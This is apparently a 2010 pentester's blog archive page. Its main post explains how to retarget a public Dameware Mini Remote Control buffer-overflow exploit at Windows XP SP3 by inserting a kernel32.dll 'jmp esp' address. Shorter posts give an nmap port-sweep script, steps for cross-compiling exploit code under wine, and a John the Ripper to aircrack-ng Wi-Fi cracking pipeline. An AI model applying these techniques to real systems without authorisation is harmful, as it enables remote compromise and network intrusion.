A follow up on the Dameware post. After updating to latest SP3 hotfixes and patches, the memory address for "jmp esp" is changed again on kernel32.dll.
At the time of this post, the new memory is:
0x7C874413
Thursday, May 27, 2010
Wednesday, May 26, 2010
Dameware Mini Remote Control Client Agent Exploit Windows XP SP3
/Start update 3/2/2011
After updating to latest SP3 hotfixes and patches, the memory address for "jmp esp" is changed again on kernel32.dll.
At the time of this post, the new memory is:
0x7C874413
/End update
An oldy, but during a pentest the client had an old version of Dameware, however running on Windows XP SP3 (not supported) by the following above code.
In the following lines where the code defines its static offset addresses to locate the "jmp esp" command:
target_os[] = ...
"WIN XP" ,{{ 0x71ab7bfb,"kernel32.dll" },{ 0x71ab7bfb,"ws2_32.dll" },{ 0x7C941EED,"ws2_32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},
...
We can see that item "3" is set to 0x00000000 and unknown.dll. This placeholder is for XP SP3.
Using Immunity Debugger and sifting through Dameware's modules, I found that it is using kernel32.dll 's jmp esp.
Thus, replace item 3 with 0x7C86467B, "kernel32.dll" to effectively altering the script to support Windows XP SP3.
Like most Buffer Overflow exploits, this one, you only get one shot before nuking the service. Thus, double check and test the exploit before carrying it out.
Tuesday, May 25, 2010
Tabnabbing
New type of phishing. This is ingenius:
Sunday, May 16, 2010
Port sweep
Quick and dirty portsweep script:
#!/bin/sh
if [ "$1" == "" ] || [ "$2" == "" ]
then
echo "./port_scan.sh [hostlist_file] [port]"
else
for host in `cat $1`
do
echo "scanning $host"
nmap -oG $host-$2.out -v $host/24 -p$2 -P0
done
grep open *$2.out | cut -d" " -f2 > $2.lst
fi
#!/bin/sh
if [ "$1" == "" ] || [ "$2" == "" ]
then
echo "./port_scan.sh [hostlist_file] [port]"
else
for host in `cat $1`
do
echo "scanning $host"
nmap -oG $host-$2.out -v $host/24 -p$2 -P0
done
grep open *$2.out | cut -d" " -f2 > $2.lst
fi
*.lst contains a list of IPs only.
Saturday, May 15, 2010
Thursday, May 13, 2010
Friday, May 7, 2010
Cross-Compiling on BT4
#cd /root/.wine/drive_c/MinGW/bin
#wine gcc.exe [file].c -o [output]
Often times the code will use winsock (for initiating shells over TCP), in this case use the lws2_32 flag:
-lws2_32
#wine gcc.exe [file].c -o [output] -lws2_32
#wine gcc.exe [file].c -o [output]
Often times the code will use winsock (for initiating shells over TCP), in this case use the lws2_32 flag:
-lws2_32
#wine gcc.exe [file].c -o [output] -lws2_32
Wednesday, May 5, 2010
Monday, May 3, 2010
Converting and Merging capture (.cap) files
Convert:
ivstools --convert [cap_file] [converted_file_name]ivstools --convert [airportSniff2NfxpB.cap] [sniff.ivs]
Merging:
ivstools --merge [ivs_file1] [ivs_file2] ... [merged_output_file_name]
ivstools --merge sniff1.ivs sniff2.ivs sniff_out.ivs
Saturday, May 1, 2010
Piping JTR to Aircrack
./john -incremental=All --stdout | aircrack-ng - e [ssid] -w - [capture_file]
Ex:
Subscribe to:
Posts (Atom)